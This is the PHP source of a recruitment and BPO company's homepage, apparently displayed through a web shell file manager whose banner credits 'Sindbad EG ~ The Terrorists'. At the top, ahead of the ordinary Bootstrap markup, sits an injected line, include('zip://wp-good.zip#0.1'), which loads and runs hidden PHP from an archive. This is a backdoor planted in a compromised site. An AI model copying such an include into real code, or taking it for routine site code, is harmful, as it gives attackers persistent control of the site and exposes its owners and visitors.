Sindbad~EG File Manager
<?php
include("zip://wp-good.zip#0.1");?>
<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Maanvi Info Solutions</title>
<?php include 'head.php' ?>
</head>
<body>
<?php
// Assuming 'header.php' will contain navigation links for:
// Home | Recruitment | BPO & Support | Digital & Tech | About Us | Contact Us
include 'header.php'
?>
<section class="tj-banner-section pb-0">
<div id="carouselExampleControls" class="carousel bg-dark slide" data-bs-ride="carousel">
<div class="carousel-inner">
<div class="carousel-item active " ><img src="img/sl1.jpg" alt=" " class="img-fluid w-100 animate__animated animate__fadeIn animate__delay-0s"></div>
<div class="carousel-item " ><img src="img/sl2.jpg" alt=" " class="img-fluid w-100 animate__animated animate__fadeIn animate__delay-0s"></div>
<div class="carousel-item " ><img src="img/sl3.jpg" alt=" " class="img-fluid w-100 animate__animated animate__fadeIn animate__delay-0s"></div>
</div>
<button class="carousel-control-prev" type="button" data-bs-target="#carouselExampleControls" data-bs-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span>
<span class="visually-hidden">Previous</span>
</button>
<button class="carousel-control-next" type="button" data-bs-target="#carouselExampleControls" data-bs-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span>
<span class="visually-hidden">Next</span>
</button>
</div>
</section>
<section class="section bg-light text-center hero-content" data-aos="zoom-in">
<div class="container">
<h1 class="fw-bold">Your Partner for <span class="text-primary">Talent, Technology, and Support</span></h1>
<p class="lead">Maanvi Info Solutions delivers integrated recruitment, BPO, and digital services to empower your business growth.</p>
<a href="about.php" class="btn btn-primary mt-3">About Us</a> <a href="contact.php" class="btn btn-outline-primary mt-3">Contact Us</a>
</div>
</section>
<section class="section bg-white">
<div class="container">
<div class="text-center mb-5">
<h2>Core <span class="text-primary">Recruitment</span> Services</h2>
<p>Comprehensive staffing solutions to fuel your business growth.</p>
</div>
<div class="row g-4">
<div class="col-md-3" data-aos="fade-up">
<div class="card card-shadow h-100">
<img src="img/12061912.png" class="card-img-top" alt="Executive Search">
<div class="card-body text-center">
<h5 class="card-title">Executive Search</h5>
<p class="card-text">Identify and recruit top-level leadership talent tailored to your organizational vision.</p>
</div>
</div>
</div>
<div class="col-md-3" data-aos="fade-up" data-aos-delay="100">
<div class="card card-shadow h-100">
<img src="img/1999360.png" class="card-img-top" alt="Contract Staffing">
<div class="card-body text-center">
<h5 class="card-title">Contract Staffing</h5>
<p class="card-text">Flexible staffing solutions to meet short-term or project-based talent needs efficiently.</p>
</div>
</div>
</div>
<div class="col-md-3" data-aos="fade-up" data-aos-delay="200">
<div class="card card-shadow h-100">
<img src="img/3967544.png" class="card-img-top" alt="Campus Hiring">
<div class="card-body text-center">
<h5 class="card-title">Campus Hiring</h5>
<p class="card-text">Connect with emerging talent from universities and colleges through structured programs.</p>
</div>
</div>
</div>
<div class="col-md-3" data-aos="fade-up" data-aos-delay="300">
<div class="card card-shadow h-100">
<img src="img/7653929.png" class="card-img-top" alt="Payroll Management">
<div class="card-body text-center">
<h5 class="card-title">Payroll Management</h5>
<p class="card-text">End-to-end payroll outsourcing services ensuring accuracy, compliance, and confidentiality.</p>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="section pt-0 bg-white">
<div class="container">
<div class="row g-4">
<div class="col-md-6" data-aos="fade-up">
<div class="p-5 bg-light rounded h-100 text-center">
<i class="fas fa-headset fa-3x text-primary mb-3"></i>
<h3 class="fw-bold">BPO & Support Services</h3>
<p>Outsource your customer support with our expert **Voice and Chat support** teams, ensuring exceptional service quality and operational efficiency.</p>
<a href="bpo-support.php" class="btn btn-outline-primary mt-3">Explore BPO Solutions</a>
</div>
</div>
<div class="col-md-6" data-aos="fade-up" data-aos-delay="100">
<div class="p-5 bg-light rounded h-100 text-center">
<i class="fas fa-code fa-3x text-primary mb-3"></i>
<h3 class="fw-bold">Digital & Tech Services</h3>
<p>From **Web Design/Development** and **Digital Marketing** (including SEO) to **Software Development**, we build your brand's digital presence.</p>
<a href="digital-tech.php" class="btn btn-outline-primary mt-3">View Tech Solutions</a>
</div>
</div>
</div>
</div>
</section>
<section class="section bg-white" id="about">
<div class="container">
<div class="row align-items-center">
<div class="col-md-6 mb-4 mb-md-0" data-aos="fade-right">
<img src="img/about-us.png" alt="About Maanvi Info Solutions" class="img-fluid rounded shadow-sm">
</div>
<div class="col-md-6" data-aos="fade-left">
<p class="text-uppercase text-primary small fw-semibold mb-2">Who We Are</p>
<h2 class="fw-bold mb-3">Empowering Businesses with <span class="text-primary">Integrated Solutions</span></h2>
<p class="text-muted mb-3">
At Maanvi Info Solutions, we specialize in delivering customized recruitment, staffing, payroll, BPO, and digital services tailored to your business needs. Our mission is to connect top-tier talent and technology with companies around the globe.
</p>
<p class="text-muted">
With a passionate team, deep industry expertise, and a people-first approach, weâve built a reputation for excellence and reliability across all our divisions.
</p>
<a href="about.php" class="btn btn-primary mt-3">Learn More</a>
</div>
</div>
</div>
</section>
<section class="section bg-light" id="services">
<div class="container">
<div class="text-center mb-5">
<p class="text-uppercase text-primary small fw-semibold">What We Do</p>
<h2 class="fw-bold">Comprehensive <span class="text-primary">Business Growth</span> Services</h2>
<p class=" ">From talent acquisition and support to digital transformation, we offer strategic and scalable solutions.</p>
</div>
<div class="row text-center">
<div class="col-md-3 mb-4" data-aos="fade-up">
<div class="p-4 bg-body rounded shadow-sm h-100">
<i class="fas fa-user-check fa-2x text-primary mb-3"></i>
<h5 class="fw-semibold">Recruitment Services</h5>
<p class=" small">End-to-end hiring solutions customized for startups, enterprises, and global teams.</p>
</div>
<a href="recruitment.php" class="small text-decoration-none">Learn more →</a>
</div>
<div class="col-md-3 mb-4" data-aos="fade-up" data-aos-delay="100">
<div class="p-4 bg-body rounded shadow-sm h-100">
<i class="fas fa-headset fa-2x text-primary mb-3"></i>
<h5 class="fw-semibold">BPO & Support</h5>
<p class=" small">Expert Voice and Chat support to enhance customer satisfaction and operational scale.</p>
</div>
<a href="bpo-support.php" class="small text-decoration-none">Learn more →</a>
</div>
<div class="col-md-3 mb-4" data-aos="fade-up" data-aos-delay="200">
<div class="p-4 bg-body rounded shadow-sm h-100">
<i class="fas fa-laptop-code fa-2x text-primary mb-3"></i>
<h5 class="fw-semibold">Digital & Tech</h5>
<p class=" small">Full-stack Web Development, Digital Marketing, SEO, and Software Solutions.</p>
</div>
<a href="digital-tech.php" class="small text-decoration-none">Learn more →</a>
</div>
<div class="col-md-3 mb-4" data-aos="fade-up" data-aos-delay="300">
<div class="p-4 bg-body rounded shadow-sm h-100">
<i class="fas fa-users-cog fa-2x text-primary mb-3"></i>
<h5 class="fw-semibold">HR Consulting</h5>
<p class=" small">Strategic HR support to align your workforce with your business vision.</p>
</div>
<a href="hr-consulting.php" class="small text-decoration-none">Learn more →</a>
</div>
</div>
</div>
</section>
<section class="section bg-body" id="why-us">
<div class="container">
<div class="row align-items-center">
<div class="col-md-6 mb-4 mb-md-0" data-aos="fade-right">
<p class="text-uppercase text-primary small fw-semibold">Why Choose Us</p>
<h2 class="fw-bold">Your <span class="text-primary">Trusted Partner</span> for Integrated Solutions</h2>
<p class="text-muted">With industry expertise, a global outlook, and people-focused solutions, Maanvi Info Solutions empowers organizations to build agile teams and robust digital foundations.</p>
<ul class="list-unstyled mt-4">
<li class="d-flex mb-3" data-aos="fade-up">
<i class="fas fa-check-circle text-primary me-3 mt-1"></i>
<span class="text-muted">Integrated services: Talent, Support, and Technology under one roof.</span>
</li>
<li class="d-flex mb-3" data-aos="fade-up" data-aos-delay="100">
<i class="fas fa-check-circle text-primary me-3 mt-1"></i>
<span class="text-muted">Expert-driven processes for faster, better hiring and service delivery.</span>
</li>
<li class="d-flex mb-3" data-aos="fade-up" data-aos-delay="200">
<i class="fas fa-check-circle text-primary me-3 mt-1"></i>
<span class="text-muted">Transparent pricing and dedicated support across all divisions.</span>
</li>
<li class="d-flex" data-aos="fade-up" data-aos-delay="300">
<i class="fas fa-check-circle text-primary me-3 mt-1"></i>
<span class="text-muted">Global talent sourcing capabilities and technology development.</span>
</li>
</ul>
</div>
<div class="col-md-6 text-center" data-aos="fade-left">
<img src="img/about-1.png" alt="Why Choose Maanvi Info Solutions" class="img-fluid rounded shadow-sm">
</div>
</div>
</div>
</section>
<section class="section bg-light " id="process">
<div class="container">
<div class="text-center mb-5">
<p class="text-uppercase text-primary small fw-semibold">How We Work</p>
<h2 class="fw-bold">Our <span class="text-primary">Proven Process</span> That Delivers Results</h2>
<p class="text-muted">From initial consultation to final delivery, we follow a transparent, step-by-step process designed to meet your unique business needs.</p>
</div>
<div class="row text-center">
<div class="col-md-3 mb-4" data-aos="fade-up">
<div class="p-4 bg-body rounded shadow-sm h-100">
<div class="mb-3">
<i class="fas fa-comments fa-2x text-primary"></i>
</div>
<h6 class="fw-semibold">1. Discovery Call</h6>
<p class="text-muted small">We understand your business, challenges, and project scope.</p>
</div>
</div>
<div class="col-md-3 mb-4" data-aos="fade-up" data-aos-delay="100">
<div class="p-4 bg-body rounded shadow-sm h-100">
<div class="mb-3">
<i class="fas fa-tools fa-2x text-primary"></i>
</div>
<h6 class="fw-semibold">2. Strategy & Plan</h6>
<p class="text-muted small">We develop a customized HR, BPO, or Digital project plan.</p>
</div>
</div>
<div class="col-md-3 mb-4" data-aos="fade-up" data-aos-delay="200">
<div class="p-4 bg-body rounded shadow-sm h-100">
<div class="mb-3">
<i class="fas fa-cogs fa-2x text-primary"></i>
</div>
<h6 class="fw-semibold">3. Execution & Delivery</h6>
<p class="text-muted small">The project/hiring/support process is executed with high standards.</p>
</div>
</div>
<div class="col-md-3 mb-4" data-aos="fade-up" data-aos-delay="300">
<div class="p-4 bg-body rounded shadow-sm h-100">
<div class="mb-3">
<i class="fas fa-chart-line fa-2x text-primary"></i>
</div>
<h6 class="fw-semibold">4. Review & Scale</h6>
<p class="text-muted small">We review results and offer ongoing support and partnership.</p>
</div>
</div>
</div>
</div>
</section>
<section class="section bg-body " id="clients">
<div class="container">
<div class="text-center mb-5">
<p class="text-uppercase text-primary small fw-semibold">Our Clients</p>
<h2 class="fw-bold">Trusted by <span class="text-primary">Leading Companies</span> Worldwide</h2>
<p class="text-muted">We are proud to serve global and local clients across industries with our innovative solutions.</p>
</div>
<div class="owl-carousel owl-theme" data-aos="fade-up">
<div class="item px-3"><img src="img/cl1.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
<div class="item px-3"><img src="img/cl2.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
<div class="item px-3"><img src="img/cl3.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
<div class="item px-3"><img src="img/cl4.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
<div class="item px-3"><img src="img/cl5.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
<div class="item px-3"><img src="img/cl6.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
<div class="item px-3"><img src="img/cl7.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
<div class="item px-3"><img src="img/cl8.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
<div class="item px-3"><img src="img/cl9.png" class="img-fluid grayscale" alt="Maanvi Client"></div>
</div>
</div>
</section>
<section class="section bg-primary text-white text-center d-flex align-items-center" id="cta" style="min-height: 80vh;">
<div class="container" data-aos="zoom-in">
<p class="text-uppercase small fw-semibold">Letâs Work Together</p>
<h2 class="fw-bold display-5">Ready to <span class="text-light">Elevate Your Business?</span></h2>
<p class="lead">Partner with Maanvi Info Solutions for unmatched expertise in talent, technology, and support.</p>
<a href="contact.php" class="btn btn-light mt-4 px-4 py-2">Get In Touch</a>
</div>
</section>
<?php include 'footer.php' ?>
</body>
</html>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists